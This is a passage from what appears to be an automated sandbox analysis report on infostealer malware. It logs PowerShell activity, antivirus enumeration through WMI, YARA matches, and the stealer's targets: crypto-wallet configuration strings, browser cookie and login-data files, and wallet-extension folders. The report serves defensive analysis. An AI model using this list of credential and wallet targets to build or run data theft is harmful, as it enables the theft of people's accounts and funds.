                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: kUHbhqh.exe, 0000000B.00000003.2182772949.0000020E99FDF000.00000004.00000020.00020000.00000000.sdmp, kUHbhqh.exe, 0000000B.00000003.2332878270.0000020E99FD9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3458715485.000000000249F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: 3.2.skotes.exe.120000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Mc3FDUMnVz.exe.940000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.skotes.exe.120000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.1404710450.0000000000121000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1374297259.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 13.2.Ryu8yUx.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.Ryu8yUx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.2258699182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 12.0.Ryu8yUx.exe.ff0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.Ryu8yUx.exe.45b9550.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.2135542163.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe, type: DROPPED
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259525415.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dow-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wI
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259525415.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dow-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wI
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259525415.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: re"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le
                              Source: kUHbhqh.exe, 0000000B.00000003.2332764643.0000020E9A063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusA
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259525415.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: re"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le
                              Source: Ryu8yUx.exe, 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
